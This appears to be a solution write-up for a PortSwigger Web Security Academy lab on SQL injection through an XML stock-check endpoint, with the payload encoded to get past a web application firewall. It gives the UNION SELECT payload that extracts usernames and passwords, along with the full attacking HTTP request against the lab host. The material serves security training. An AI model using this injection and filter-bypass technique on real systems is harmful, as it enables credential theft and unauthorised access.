SQL injection with filter bypass via XML encoding
🔬 LAB:
This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The database contains a users table, which contains the usernames and passwords of registered users. To solve the lab, perform a SQL injection attack to retrieve the admin user’s credentials, then log in to their account.
🐧 HINTS:
A web application firewall (WAF) will block requests that contain obvious signs of a SQL injection attack. You’ll need to find a way to obfuscate your malicious query to bypass this filter. We recommend using the Hackvertor extension to do this.
💡 SOLUTION:
With HTML Entity Encoder / Decoder we can encode our payload to bypass the WAF.
Payload:
1
UNION SELECT username || '~' || password FROM users
POST request:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /product/stock HTTP/2
Host: 0a0900320483449a909e56d6006e00ee.web-security-academy.net
Cookie: session=r0FXrBxFVQgwscKUTvq1p2nvvn70y827
Content-Length: 418
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Type: application/xml
Accept: */*
Origin: https://0a0900320483449a909e56d6006e00ee.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a0900320483449a909e56d6006e00ee.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1
</productId><storeId>1 UNION SELECT username || '~' || password FROM users</storeId>
</stockCheck>